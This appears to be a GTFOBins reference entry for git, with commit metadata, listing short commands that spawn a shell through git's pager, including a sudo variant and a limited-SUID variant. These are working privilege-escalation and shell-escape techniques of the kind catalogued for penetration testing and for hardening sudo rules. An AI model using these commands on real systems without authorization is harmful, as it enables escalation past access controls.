GTFOBins.github.io/_gtfobins/git.md
Syed Umar Arfeen b8493f916d Increase the probability that the pager is called by Git
`git help config` produces a much longer output, hopefully longer than the
terminal window.

Close #62
2019-06-23 17:17:59 +02:00

590 B

functions
shell sudo limited-suid
code
PAGER='sh -c "exec sh 0<&1"' git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. git help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. sudo git help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' ./git -p help